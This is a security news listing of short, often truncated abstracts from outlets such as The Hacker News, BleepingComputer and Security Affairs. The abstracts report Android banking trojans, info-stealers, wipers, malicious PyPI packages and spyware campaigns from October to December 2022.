Abstract
Resecurity has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators. "In the Box" dark web marketplace is leveraged by cybercriminals to attack over 300 financial institutions (FIs), payment... Security Affairs
December 5, 2022
Platform Certificates Used to Sign Android Malware Installers and Droppers Full Text
Abstract
Several platform certificates, belonging to LG Electronics, Revoview, Mediatek, and Samsung Electronics, were found being abused by threat actors to sign malicious Android apps. Google recommends vendors minimize the number of applications signed with the platform certificate to lower the cost of p... Cyware
December 04, 2022
Android malware apps with 2 million installs spotted on Google Play Full Text
Abstract
A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them. BleepingComputer
December 4, 2022
New CryWiper wiper targets Russian entities masquerading as a ransomware Full Text
Abstract
Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor's offices and courts. Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive... Security Affairs
December 3, 2022
Schoolyard Bully Trojan Steals Facebook Credentials Full Text
Abstract
Schoolyard Bully Trojan, a new Android threat campaign, victimized over 300,000 users across 71 countries. The malware steals Facebook credentials pretending to be educational apps. Experts found 37 apps associated with this campaign and these are actively being distributed via third-party app stor... Cyware
December 2, 2022
Wipers Are Widening: Here’s Why That Matters Full Text
Abstract
In the first half of this year, researchers saw a rising trend of wiper malware being deployed in parallel with the Russia-Ukraine war. However, those wipers haven’t stayed in one place – they’re emerging globally. Security Week
December 2, 2022
Android Keyboard Apps with 2 Million downloads can remotely hack your device Full Text
Abstract
Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively... Security Affairs
December 02, 2022
New CryWiper data wiper targets Russian courts, mayor’s offices Full Text
Abstract
A previously undocumented data wiper named CryWiper is masquerading as ransomware, extorting victims to pay for a decrypter, but in reality, it just destroys data beyond recovery. BleepingComputer
December 2, 2022
Archive files become preferred format for malware delivery Full Text
Abstract
The team at HP Wolf Security found that cybercriminals are using archive files as the preferred method for spreading malware, beating Microsoft Office for the first time. Tech Target
Dec 02, 2022
Watch Out! These Android Keyboard Apps With 2 Million Installs Can be Hacked Remotely Full Text
Abstract
Multiple unpatched vulnerabilities have been discovered in three Android apps that allow a smartphone to be used as a remote keyboard and mouse. The apps in question are Lazy Mouse, PC Keyboard, and Telepad, which have been cumulatively downloaded over two million times from the Google Play Store. Telepad is no longer available through the app marketplace but can be downloaded from its website. Lazy Mouse (com.ahmedaay.lazymouse2 and com.ahmedaay.lazymousepro); PC Keyboard (com.beapps.pckeyboard); Telepad (com.pinchtools.telepad). While these apps function by connecting to a server on a desktop and transmitting to it the mouse and keyboard events, the Synopsys Cybersecurity Research Center (CyRC) found as many as seven flaws related to weak or missing authentication, missing authorization, and insecure communication. The issues (from CVE-2022-45477 through CVE-2022-45483), in a nutshell, could be exploited by a malicious actor to execute arbitrary commands sans authenticati... The Hacker News
Dec 01, 2022
Google Accuses Spanish Spyware Vendor of Exploiting Chrome, Firefox, & Windows Zero-Days Full Text
Abstract
A Barcelona-based surveillanceware vendor named Variston IT is said to have surreptitiously planted spyware on targeted devices by exploiting several zero-day flaws in Google Chrome, Mozilla Firefox, and Windows, some of which date back to December 2018. "Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender, and provides all the tools necessary to deploy a payload to a target device," Google Threat Analysis Group (TAG) researchers Clement Lecigne and Benoit Sevens said in a write-up. Variston, which has a bare-bones website, claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support "the discovery of digital information by [law enforcement agencies]," among other services. The vulnerabilities, which have been patched by Google, Microsoft, and Mozilla in 2021 and early 2022, are believed to... The Hacker News
Dec 01, 2022
Schoolyard Bully Trojan Apps Stole Facebook Credentials from Over 300,000 Android Users Full Text
Abstract
More than 300,000 users across 71 countries have been victimized by a new Android threat campaign called the Schoolyard Bully Trojan. Mainly designed to steal Facebook credentials, the malware is camouflaged as legitimate education-themed applications to lure unsuspecting users into downloading them. The apps, which were available for download from the official Google Play Store, have now been taken down. That said, they still continue to be available on third-party app stores. "This trojan uses JavaScript injection to steal the Facebook credentials," Zimperium researchers Nipun Gupta and Aazim Bill SE Yaswant said in a report shared with The Hacker News. It achieves this by launching Facebook's login page in a WebView, which also embeds within it malicious JavaScript code to exfiltrate the user's phone number, email address, and password to a configured command-and-control (C2) server. The Schoolyard Bully Trojan further makes use of native libraries such... The Hacker News
December 01, 2022
Android malware infected 300,000 devices to steal Facebook accounts Full Text
Abstract
An Android malware campaign masquerading as reading and education apps has been underway since 2018, attempting to steal Facebook account credentials from infected devices. BleepingComputer
December 1, 2022
New Go-based Redigo malware targets Redis servers Full Text
Abstract
Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat... Security Affairs
December 01, 2022
New Redigo malware drops stealthy backdoor on Redis servers Full Text
Abstract
A new Go-based malware threat that researchers call Redigo has been targeting Redis servers vulnerable to CVE-2022-0543 to plant a stealthy backdoor and allow command execution. BleepingComputer
December 01, 2022
New DuckLogs malware service claims having thousands of ‘customers’ Full Text
Abstract
A new malware-as-a-service (MaaS) operation named 'DuckLogs' has emerged, giving low-skilled attackers easy access to multiple modules to steal information, log keystrokes, access clipboard data, and remotely access the compromised host. BleepingComputer
December 1, 2022
ScarCruft’s New Dolphin Backdoor Uses Google Drive for C&C Communication Full Text
Abstract
The backdoor has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers. ESET Security
November 30, 2022
Google links three exploitation frameworks to Spanish commercial spyware vendor Variston Full Text
Abstract
Google’s Threat Analysis Group (TAG) linked three exploitation frameworks to a Spanish surveillance spyware vendor named Variston. While tracking the activities of commercial spyware vendors, Threat Analysis Group (TAG) spotted an exploitation framework... Security Affairs
November 30, 2022
This Malicious App Abused Hacked Devices to Create Fake Accounts on Multiple Platforms Full Text
Abstract
A malicious Android SMS application discovered on the Google Play Store has been found to stealthily harvest text messages with the goal of creating accounts on a wide range of platforms like Facebook, Google, and WhatsApp. The app, named Symoo (com.vanjan.sms), had over 100,000 downloads and functioned as a relay for transmitting messages to a server, which advertises an account creation service. This is achieved by using the phone numbers associated with the infected devices as a means to gather the one-time password that's typically sent to verify the user when setting up new accounts. "The malware asks the phone number of the user in the first screen," security researcher Maxime Ingrao, who discovered the malware, said, while also requesting for SMS permissions. "Then it pretends to load the application but remains all the time on this page, it is to hide the interface of the received SMS and that the user does not see the SMS of subscriptions to the va... The Hacker News
November 30, 2022
New Windows malware scans victims’ mobile phones for data to steal Full Text
Abstract
Security researchers found a previously unknown backdoor they call Dolphin that's been used by North Korean hackers in highly targeted operations for more than a year to steal files and send them to Google Drive storage. BleepingComputer
November 30, 2022
Android and iOS apps with 15 million installs extort loan seekers Full Text
Abstract
Over 280 Android and iOS apps on the Google Play and the Apple App stores trapped users in loan schemes with misleading terms and employed various methods to extort and harass borrowers. BleepingComputer
November 28, 2022
Malicious Android app found powering account creation service Full Text
Abstract
A fake Android SMS application, with 100,000 downloads on the Google Play store, has been discovered to secretly act as an SMS relay for an account creation service for sites like Microsoft, Google, Instagram, Telegram, and Facebook. BleepingComputer
November 24, 2022
Docker Hub repositories hide over 1,650 malicious containers Full Text
Abstract
Over 1,600 publicly available Docker Hub images hide malicious behavior, including cryptocurrency miners, embedded secrets that can be used as backdoors, DNS hijackers, and website redirectors. BleepingComputer
November 24, 2022
Hackers modify popular OpenVPN Android app to include spyware Full Text
Abstract
A threat actor associated with cyberespionage operations since at least 2017 has been luring victims with fake VPN software for Android that is a trojanized version of legitimate software SoftVPN and OpenVPN. BleepingComputer
November 24, 2022
This Android File Manager App Infected Thousands of Devices with SharkBot Malware Full Text
Abstract
The Android banking fraud malware known as SharkBot has reared its head once again on the official Google Play Store, posing as file managers to bypass the app marketplace's restrictions. A majority of the users who downloaded the rogue apps are located in the U.K. and Italy, Romanian cybersecurity company Bitdefender said in an analysis published this week. SharkBot, first discovered towards the end of 2021 by Cleafy, is a recurring mobile threat distributed both on the Google Play Store and other third-party app stores. One of the trojan's primary goals is to initiate money transfers from compromised devices via a technique called "Automatic Transfer System" (ATS), in which a transaction triggered via a banking app is intercepted to swap the payee account with an actor-controlled account in the background. It's also capable of serving a fake login overlay when users attempt to open legitimate banking apps, stealing the credentials in the proce... The Hacker News
November 23, 2022
Ducktail Malware Operation Evolves with New Malicious Capabilities Full Text
Abstract
The operators of the Ducktail information stealer have demonstrated a "relentless willingness to persist" and continued to update their malware as part of an ongoing financially driven campaign. "The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account," WithSecure researcher Mohammad Kazem Hassan Nejad said in a new analysis. "The operation ultimately hijacks Facebook Business accounts to which the victim has sufficient access. The threat actor uses their gained access to run ads for monetary gain." Attributed to a Vietnamese threat actor, the Ducktail campaign is designed to target businesses in the digital marketing and advertising sectors which are active on the Facebook Ads and Business platform. Also targeted are individuals within prospective companies that are likely to have high-level access to Facebook Business accounts. This includes... The Hacker News
November 23, 2022
Ducktail information stealer continues to evolve Full Text
Abstract
The operators behind the Ducktail information stealer continue to improve their malicious code, experts warn. In late July 2022, researchers from WithSecure (formerly F-Secure Business) discovered an ongoing operation, named DUCKTAIL, that... Security Affairs
November 23, 2022
Nighthawk Likely to Become Hackers’ New Post-Exploitation Tool After Cobalt Strike Full Text
Abstract
A nascent and legitimate penetration testing framework known as Nighthawk is likely to gain threat actors' attention for its Cobalt Strike-like capabilities. Enterprise security firm Proofpoint said it detected the use of the software in mid-September 2022 with a number of test emails sent using generic subject lines such as "Just checking in" and "Hope this works2." However, there are no indications that a leaked or cracked version of Nighthawk is being weaponized by threat actors in the wild, Proofpoint researcher Alexander Rausch said in a write-up. Nighthawk, launched in December 2021 by a company called MDSec, is analogous to its counterparts Cobalt Strike, Sliver, and Brute Ratel, offering a red team toolset for adversary threat simulation. It's licensed for £7,500 (or $10,000) per user for a year. "Nighthawk is the most advanced and evasive command-and-control framework available on the market," MDSec notes. "Nighthawk i... The Hacker News
November 23, 2022
Backdoored Chrome extension installed by 200,000 Roblox players Full Text
Abstract
Chrome browser extension 'SearchBlox' installed by more than 200,000 users has been discovered to contain a backdoor that can steal your Roblox credentials as well as your assets on Rolimons, a Roblox trading platform. BleepingComputer
November 22, 2022
This Malware Installs Malicious Browser Extensions to Steal Users’ Passwords and Cryptos Full Text
Abstract
A malicious extension for Chromium-based web browsers has been observed to be distributed via a long-standing Windows information stealer called ViperSoftX. Czech-based cybersecurity company dubbed the rogue browser add-on VenomSoftX owing to its standalone features that enable it to access website visits, steal credentials and clipboard data, and even swap cryptocurrency addresses via an adversary-in-the-middle (AiTM) attack. ViperSoftX, which first came to light in February 2020, was characterized by Fortinet as a JavaScript-based remote access trojan and cryptocurrency stealer. The malware's use of a browser extension to advance its information-gathering goals was documented by Sophos threat analyst Colin Cowie earlier this year. "This multi-stage stealer exhibits interesting hiding capabilities, concealed as small PowerShell scripts on a single line in the middle of otherwise innocent-looking large log files, among others," Avast researcher Jan Rubín said... The Hacker News
November 22, 2022
Android file manager apps infect thousands with Sharkbot malware Full Text
Abstract
A new collection of malicious Android apps posing as harmless file managers had infiltrated the official Google Play app store, infecting users with the Sharkbot banking trojan. BleepingComputer
November 22, 2022
Aurora Stealer Malware is becoming a prominent threat in the cybercrime ecosystem Full Text
Abstract
Researchers warn of threat actors employing a new Go-based malware dubbed Aurora Stealer in attacks in the wild. Aurora Stealer is an info-stealing malware that was first advertised on Russian-speaking underground forums in April 2022. Aurora was offered... Security Affairs
November 22, 2022
Emotet is back and delivers payloads like IcedID and Bumblebee Full Text
Abstract
The Emotet malware is back and experts warn of a high-volume malspam campaign delivering payloads like IcedID and Bumblebee. Proofpoint researchers warn of the return of the Emotet malware, in early November the experts observed a high-volume malspam... Security Affairs
November 21, 2022
Aurora infostealer malware increasingly adopted by cybergangs Full Text
Abstract
Cybercriminals are increasingly turning to a new Go-based information stealer named 'Aurora' to steal sensitive information from browsers and cryptocurrency apps, exfiltrate data directly from disks, and load additional payloads. BleepingComputer
November 21, 2022
Notorious Emotet Malware Returns With High-Volume Malspam Campaign Full Text
Abstract
The notorious Emotet malware has returned with renewed vigor as part of a high-volume malspam campaign designed to drop payloads like IcedID and Bumblebee. "Hundreds of thousands of emails per day" have been sent since early November 2022, enterprise security company Proofpoint said last week, adding, "the new activity suggests Emotet is returning to its full functionality acting as a delivery network for major malware families." Among the primary countries targeted are the U.S., the U.K., Japan, Germany, Italy, France, Spain, Mexico, and Brazil. The Emotet-related activity was last observed in July 2022, although sporadic infections have been reported since then. In mid-October, ESET revealed that Emotet may be readying for a new wave of attacks, pointing out updates to its "systeminfo" module. The malware, which is attributed to a threat actor known as Mummy Spider (aka Gold Crestwood or TA542), staged a revival of sorts late last yea... The Hacker News
November 21, 2022
Google provides rules to detect tens of cracked versions of Cobalt Strike Full Text
Abstract
Researchers at Google Cloud identified 34 different hacked release versions of the Cobalt Strike tool in the wild. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine... Security Affairs
November 21, 2022
Google Identifies 34 Cracked Versions of Popular Cobalt Strike Hacking Toolkit in the Wild Full Text
Abstract
Google Cloud last week disclosed that it identified 34 different hacked release versions of the Cobalt Strike tool in the wild, the earliest of which shipped in November 2012. The versions, spanning 1.44 to 4.7, add up to a total of 275 unique JAR files, according to findings from the Google Cloud Threat Intelligence (GCTI) team. The latest version of Cobalt Strike is version 4.7.2. Cobalt Strike, developed by Fortra (née HelpSystems), is a popular adversarial framework used by red teams to simulate attack scenarios and test the resilience of their cyber defenses. It comprises a Team Server that acts as the command-and-control (C2) hub to remotely commandeer infected devices and a stager that's designed to deliver a next-stage payload called the Beacon, a fully-featured implant that reports back to the C2 server. Given its wide-ranging suite of features, unauthorized versions of the software have been increasingly weaponized by many a threat actor to advance... The Hacker News
November 21, 2022
Google Chrome extension used to steal cryptocurrency, passwords Full Text
Abstract
An information-stealing Google Chrome browser extension named 'VenomSoftX' is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web. BleepingComputer
November 19, 2022
New improved versions of LodaRAT spotted in the wild Full Text
Abstract
Cisco Talos spotted multiple updated versions of LodaRAT that were deployed alongside other malware families, including RedLine and Neshta. Researchers from Cisco Talos have monitored the LodaRAT malware over the course of 2022 and recently discovered... Security Affairs
November 18, 2022
LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities Full Text
Abstract
The LodaRAT malware has resurfaced with new variants that are being deployed in conjunction with other sophisticated malware, such as RedLine Stealer and Neshta. "The ease of access to its source code makes LodaRAT an attractive tool for any threat actor who is interested in its capabilities," Cisco Talos researcher Chris Neal said in a write-up published Thursday. Aside from being dropped alongside other malware families, LodaRAT has also been observed being delivered through a previously unknown variant of another commodity trojan called Venom RAT, which has been codenamed S500. An AutoIT-based malware, LodaRAT (aka Nymeria) is attributed to a group called Kasablanca and is capable of harvesting sensitive information from compromised machines. In February 2021, an Android version of the malware sprang forth as a way for the threat actors to expand their attack surface. Then in September 2022, Zscaler ThreatLabz uncovered a new delivery mechanism that involved... The Hacker News
November 18, 2022
W4SP Stealer Constantly Targeting Python Developers in Ongoing Supply Chain Attack Full Text
Abstract
An ongoing supply chain attack has been leveraging malicious Python packages to distribute malware called W4SP Stealer, with hundreds of victims ensnared to date. "The threat actor is still active and is releasing more malicious packages," Checkmarx researcher Jossef Harush said in a technical write-up, calling the adversary WASP. "The attack seems related to cybercrime as the attacker claims that these tools are undetectable to increase sales." The findings from Checkmarx build on recent reports from Phylum and Check Point, which flagged 30 different modules published on the Python Package Index (PyPI) that were designed to propagate malicious code under the guise of benign-looking packages. The attack is just the latest threat to target the software supply chain. What makes it notable is the use of steganography to extract a polymorphic malware payload hidden within an image file hosted on Imgur. The installation of the package ultimately mak... The Hacker News
November 17, 2022
WASP Malware Uses Steganography and Polymorphism to Evade Detection Full Text
Abstract
PyPI, an open-source repository used by developers to share Python packages used in projects, is an increasingly popular target in software supply chain attacks for uploading malicious code via fake packages. The Register
November 15, 2022
Typhon Reborn: Stealer Comes Back with New Capabilities Full Text
Abstract
Crypto miner/stealer for hire, Typhon Stealer, received a new update in the form of Typhon Reborn, Palo Alto Networks disclosed. The new variant boasts enhanced anti-analysis techniques and other stealing and file-grabber features. Researchers found that it leverages Telegram’s API and infrastructu... Cyware Alerts - Hacker News
November 15, 2022
Dtrack Malware Operations Expanded to Europe and Latin America Full Text
Abstract
DTrack is a backdoor used by the Lazarus group. Initially discovered in 2019, the backdoor remains in use three years later. It is used by the Lazarus group against a wide variety of targets. Securelist
November 14, 2022
Malicious Google Play Store App Distributes Xenomorph Banking Trojan Full Text
Abstract
The Zscaler ThreatLabz team stumbled across the Xenomorph banking trojan loaded over a lifestyle app called ‘Todo: Day manager,’ in the Google Play store. The malware is dropped via GitHub as a fake Google Service application right during the installation of the app. It opens as an overlay onto leg... Cyware Alerts - Hacker News
November 12, 2022
Malicious app in the Play Store spotted distributing Xenomorph Banking Trojan Full Text
Abstract
Experts discovered two new malicious dropper apps on the Google Play Store distributing the Xenomorph banking malware. Zscaler ThreatLabz researchers discovered a couple of malicious dropper apps on the Play Store distributing the Xenomorph banking... Security Affairs
November 11, 2022
Malicious Google Play Store App Spotted Distributing Xenomorph Banking Trojan Full Text
Abstract
Google has removed two new malicious dropper apps that have been detected on the Play Store for Android, one of which posed as a lifestyle app and was caught distributing the Xenomorph banking malware. "Xenomorph is a trojan that steals credentials from banking applications on users' devices," Zscaler ThreatLabz researchers Himanshu Sharma and Viral Gandhi said in an analysis published Thursday. "It is also capable of intercepting users' SMS messages and notifications, enabling it to steal one-time passwords and multi-factor authentication requests." The cybersecurity firm said it also found an expense tracker app that exhibited similar behavior, but noted that it couldn't extract the URL used to fetch the malware artifact. The two malicious apps are as follows: Todo: Day manager (com.todo.daymanager); 経費キーパー (com.setprice.expenses). Both the apps function as a dropper, meaning the apps themselves are harmless and are a conduit to retrieve t... The Hacker News
November 11, 2022
New BadBazaar Android malware linked to Chinese cyberspies Full Text
Abstract
A previously undocumented Android spyware tool named 'BadBazaar' has been discovered targeting ethnic and religious minorities in China, most notably the Uyghurs in Xinjiang. BleepingComputer
November 10, 2022
Spymax RAT Targets Indian Defense Personnel Full Text
Abstract
Threat actors are using a malicious Android installation package and the Spymax RAT variant to target Indian defense personnel. The RAT imitates the Adobe Reader app. The campaign has been going on for more than a year and researchers have still not been able to attribute it to any threat actor. Th... Cyware Alerts - Hacker News
November 10, 2022
Researchers warn of malicious packages on PyPI using steganography Full Text
Abstract
Experts discovered a malicious package on the Python Package Index (PyPI) that uses steganography to hide malware within image files. CheckPoint researchers discovered a malicious package, named 'apicolor,' on the Python Package Index (PyPI) that... Security Affairs
November 10, 2022
Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File Full Text
Abstract
A malicious package discovered on the Python Package Index (PyPI) has been found employing a steganographic trick to conceal malicious code within image files. The package in question, named "apicolor," was uploaded to the Python third-party repository on October 31, 2022, and described as a "Core lib for REST API," according to Israeli cybersecurity firm Check Point. It has since been taken down. Apicolor, like other rogue packages detected recently, harbors its malicious behavior in the setup script used to specify metadata associated with the package, such as its dependencies. This takes the form of a second package called "judyb" as well as a seemingly harmless PNG file ("8F4D2uF.png") hosted on Imgur, an image-sharing service. "The judyb code turned out to be a steganography module, responsible [for] hiding and revealing hidden messages inside pictures," Check Point explained. The attack chain entails using the judy... The Hacker News
November 09, 2022
New StrelaStealer malware steals your Outlook, Thunderbird accounts Full Text
Abstract
A new information-stealing malware named 'StrelaStealer' is actively stealing email account credentials from Outlook and Thunderbird, two widely used email clients. BleepingComputer
November 9, 2022
Experts observed Amadey malware deploying LockBit 3.0 Ransomware Full Text
Abstract
Experts noticed that the Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems. Researchers from AhnLab Security Emergency Response Center (ASEC) reported that the Amadey malware is being used to deploy LockBit 3.0 ransomware on... Security Affairs
November 09, 2022
New IceXLoader Malware Loader Variant Infected Thousands of Victims Worldwide Full Text
Abstract
An updated version of a malware loader codenamed IceXLoader is suspected of having compromised thousands of personal and enterprise Windows machines across the world. IceXLoader is a commodity malware that's sold for $118 on underground forums for a lifetime license. It's chiefly employed to download and execute additional malware on breached hosts. This past June, Fortinet FortiGuard Labs said it uncovered a version of the trojan written in the Nim programming language with the goal of evading analysis and detection. "While the version discovered in June (v3.0) looked like a work-in-progress, we recently observed a newer v3.3.3 loader which looks to be fully functionable and includes a multi-stage delivery chain," Natalie Zargarov, cybersecurity researcher at Minerva Labs, said in a report published Tuesday. IceXLoader is traditionally distributed through phishing campaigns, with emails containing ZIP archives functioning as a trigger to deploy the malwar... The Hacker News
November 9, 2022
Malicious Chrome Extension Steals Information and Drops Cloud9 Botnet
Abstract
Zimperium discovered a malicious browser extension, which not only steals the information available during the browser session but can also install malware on a user’s device and subsequently assume control of the entire device. (Source: Zimperium)
November 08, 2022
Malicious extension lets attackers control Google Chrome remotely
Abstract
A new Chrome browser botnet named 'Cloud9' has been discovered in the wild using malicious extensions to steal online accounts, log keystrokes, inject ads and malicious JS code, and enlist the victim's browser in DDoS attacks. (Source: BleepingComputer)
November 08, 2022
New Laplas Clipper Malware Targeting Cryptocurrency Users via SmokeLoader
Abstract
Cryptocurrency users are being targeted with a new clipper malware strain dubbed Laplas by means of another malware known as SmokeLoader. SmokeLoader, which is delivered by means of weaponized documents sent through spear-phishing emails, further acts as a conduit for other commodity trojans like SystemBC and Raccoon Stealer 2.0, according to an analysis from Cyble. Observed in the wild since circa 2013, SmokeLoader functions as a generic loader capable of distributing additional payloads onto compromised systems, such as information-stealing malware and other implants. In July 2022, it was found to deploy a backdoor called Amadey. Cyble said it discovered over 180 samples of the Laplas since October 24, 2022, suggesting a wide deployment. Clippers, also called ClipBankers, fall under a category of malware that Microsoft calls cryware, which are designed to steal crypto by keeping close tabs on a victim's clipboard activity and swapping the original wallet ad [...] (Source: The Hacker News)
November 8, 2022
SmokeLoader campaign distributes new Laplas Clipper malware
Abstract
Researchers observed a SmokeLoader campaign that is distributing a new clipper malware dubbed Laplas Clipper that targets cryptocurrency users. Cyble researchers uncovered a SmokeLoader campaign that is distributing community malware, such as SystemBC and Raccoon... (Source: Security Affairs)
November 7, 2022
SocGholish Diversifies and Expands Its Malware Staging Infrastructure to Counter Defenders
Abstract
Attackers conduct a variety of activities after gaining access through SocGholish, such as system and network reconnaissance, establishing persistence, and deployment of additional tools and malware. (Source: Sentinel One)
November 7, 2022
Laplas Clipper - A Feature-Rich Clipper With Sophisticated Tactics
Abstract
Cryptocurrency users worldwide are under attack with the novel Laplas Clipper clipboard stealer, which is being delivered through Smoke Loader and Raccoon Stealer 2.0. Laplas actively monitors the victim’s clipboard activity and replaces the wallet address with a lookalike wallet address during the ... (Source: Cyware Alerts - Hacker News)
November 05, 2022
Researchers Uncover 29 Malicious PyPI Packages Targeting Developers with W4SP Stealer
Abstract
Cybersecurity researchers have uncovered 29 packages in Python Package Index (PyPI), the official third-party software repository for the Python programming language, that aim to infect developers' machines with a malware called W4SP Stealer. "The main attack seems to have started around October 12, 2022, slowly picking up steam to a concentrated effort around October 22," software supply chain security company Phylum said in a report published this week. The list of offending packages is as follows: typesutil, typestring, sutiltype, duonet, fatnoob, strinfer, pydprotect, incrivelsim, twyne, pyptext, installpy, faq, colorwin, requests-httpx, colorsama, shaasigma, stringe, felpesviadinho, cypress, pystyte, pyslyte, pystyle, pyurllib, algorithmic, oiu, iao, curlapi, type-color, and pyhints. Collectively, the packages have been downloaded more than 5,700 times, with some of the libraries (e.g., twyne and colorsama) relying on typosquatting to trick unsuspecting users [...] (Source: The Hacker News)
November 5, 2022
29 malicious PyPI packages spotted delivering the W4SP Stealer
Abstract
Cybersecurity researchers discovered 29 malicious PyPI packages delivering the W4SP stealer to developers' systems. Cybersecurity researchers have discovered 29 packages in the official Python Package Index (PyPI) repository designed to infect developers'... (Source: Security Affairs)
November 04, 2022
Researchers Detail New Malware Campaign Targeting Indian Government Employees
Abstract
The Transparent Tribe threat actor has been linked to a new campaign aimed at Indian government organizations with trojanized versions of a two-factor authentication solution called Kavach. "This group abuses Google advertisements for the purpose of malvertising to distribute backdoored versions of Kavach multi-authentication (MFA) applications," Zscaler ThreatLabz researcher Sudeep Singh said in a Thursday analysis. The cybersecurity company said the advanced persistent threat group has also conducted low-volume credential harvesting attacks in which rogue websites masquerading as official Indian government websites were set up to lure unwitting users into entering their passwords. Transparent Tribe, also known by the monikers APT36, Operation C-Major, and Mythic Leopard, is a suspected Pakistan adversarial collective that has a history of striking Indian and Afghanistan entities. The latest attack chain is not the first time the threat actor has set its sights [...] (Source: The Hacker News)
November 4, 2022
RomCom RAT campaign abuses popular brands like KeePass and SolarWinds NPM
Abstract
A new campaign spreading RomCom RAT impersonates popular software brands like KeePass and SolarWinds. The threat actor behind the RomCom RAT (remote access trojan) has refreshed its attack vector and is now abusing well-known software brands for distribution. Researchers... (Source: Security Affairs)
November 03, 2022
RomCom RAT malware campaign impersonates KeePass, SolarWinds NPM, Veeam
Abstract
The threat actor behind the RomCom RAT (remote access trojan) has refreshed its attack vector and is now abusing well-known software brands for distribution. (Source: BleepingComputer)
November 3, 2022
Drinik Malware Now Targets 18 Indian Banks
Abstract
Cyble researchers found a new version of the Drinik Android trojan targeting 18 Indian banks while posing as the country’s official tax management app. It attempts to steal victims’ banking credentials and personal information. Since 2016, Drinik has been circulating in India and operating as an SM ... (Source: Cyware Alerts - Hacker News)
November 2, 2022
4 Malicious apps on Play Store totaled +1M downloads
Abstract
Four malicious Android apps uploaded by the same developer to Google Play totaled at least one million downloads. Malwarebytes researchers discovered four malicious apps uploaded by the same developer (Mobile apps Group) to the official Google Play.... (Source: Security Affairs)
November 02, 2022
Dozens of PyPI packages caught dropping ‘W4SP’ info-stealing malware
Abstract
Researchers have discovered over two dozen Python packages on the PyPI registry that are pushing info-stealing malware. (Source: BleepingComputer)
November 02, 2022
Inside Raccoon Stealer V2
Abstract
Raccoon Stealer is back on the news again. US officials arrested Mark Sokolovsky, one of the malware actors behind this program. In July 2022, after several months of the shutdown, a Raccoon Stealer V2 went viral. Last week, the Department of Justice's press release stated that the malware collected 50 million credentials. This article will give a quick guide to the latest info stealer's version. What is Raccoon infostealer V2? Raccoon Stealer is a kind of malware that steals various data from an infected computer. It's quite a basic malware, but hackers have made Raccoon popular with excellent service and simple navigation. In 2019, Raccoon infostealer was one of the most discussed malware. In exchange for $75 per week and $200 per month, cybercriminals sold this simple but versatile info stealer as a MaaS. The malware was successful in attacking a number of systems. In March 2022, however, threat authors ceased to operate. An updated version of this malware was r [...] (Source: The Hacker News)
November 2, 2022
SandStrike, a previously undocumented Android malware, targets a Persian-speaking religious minority
Abstract
Threat actors are using previously undocumented Android spyware, dubbed SandStrike, to spy on a Persian-speaking religious minority. In Q3 2022, Kaspersky researchers uncovered a previously undocumented Android spyware, dubbed SandStrike, employed... (Source: Security Affairs)
November 02, 2022
Experts Warn of SandStrike Android Spyware Infecting Devices via Malicious VPN App
Abstract
A previously undocumented Android spyware campaign has been found striking Persian-speaking individuals by masquerading as a seemingly harmless VPN application. Russian cybersecurity firm Kaspersky is tracking the campaign under the moniker SandStrike. It has not been attributed to any particular threat group. "SandStrike is distributed as a means to access resources about the Bahá'í religion that are banned in Iran," the company noted in its APT trends report for the third quarter of 2022. While the app is ostensibly designed to provide victims with a VPN connection to bypass the ban, it's also configured to covertly siphon data from the victims' devices, such as call logs, contacts, and even connect to a remote server to fetch additional commands. The booby-trapped VPN service, while fully functional, is said to be distributed via a Telegram channel controlled by the adversary. Links to the channel are also advertised on fabricated social media acco [...] (Source: The Hacker News)
November 01, 2022
Malicious Android apps with 1M+ installs found on Google Play
Abstract
A set of four malicious applications currently available in Google Play, the official store for the Android system, are directing users to sites that steal sensitive information or generate 'pay-per-click' revenue for the operators. (Source: BleepingComputer)
November 01, 2022
New SandStrike spyware infects Android devices via malicious VPN app
Abstract
Threat actors are using a newly discovered spyware known as SandStrike and delivered via a malicious VPN application to target Persian-speaking Android users. (Source: BleepingComputer)
November 01, 2022
Google ad for GIMP.org served info-stealing malware via lookalike site
Abstract
Searching for 'GIMP' on Google as recently as last week would show visitors an ad for 'GIMP.org,' the official website of the well known graphics editor, GNU Image Manipulation Program. But clicking on it drove visitors to a lookalike phishing website that provided them with a 700 MB executable disguised as GIMP which was malware. (Source: BleepingComputer)
October 31, 2022
Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure
Abstract
While APTs get the most breathless coverage in the news, many threat actors have money on their mind rather than espionage. You can learn a lot about the innovations used by these financially motivated groups by watching banking Trojans. (Source: Palo Alto Networks)
October 31, 2022
Wannacry, the hybrid malware that brought the world to its knees
Abstract
Reflecting on the Wannacry ransomware attack: what is the lesson learnt, and why most organizations are still ignoring it. In the early afternoon of Friday 12 May 2017, the media broke the news of a global computer security attack carried out through... (Source: Security Affairs)
October 31, 2022
Malicious dropper apps on Play Store totaled 30.000+ installations
Abstract
ThreatFabric researchers discovered five malicious dropper apps on Google Play Store with more than 130,000 downloads. Researchers at ThreatFabric have discovered five malicious dropper apps on the official Google Play Store. The malicious dropper... (Source: Security Affairs)
October 31, 2022
ShadowPad Malware Analysis Highlights C2 Infrastructure and New Associations
Abstract
Between September 2021 and September 2022, 83 ShadowPad C2 servers (75 unique IPs) were identified on the internet. ShadowPad supports six C2 protocols: TCP, SSL, HTTP, HTTPS, UDP, and DNS. (Source: Cyware Alerts - Hacker News)
October 30, 2022
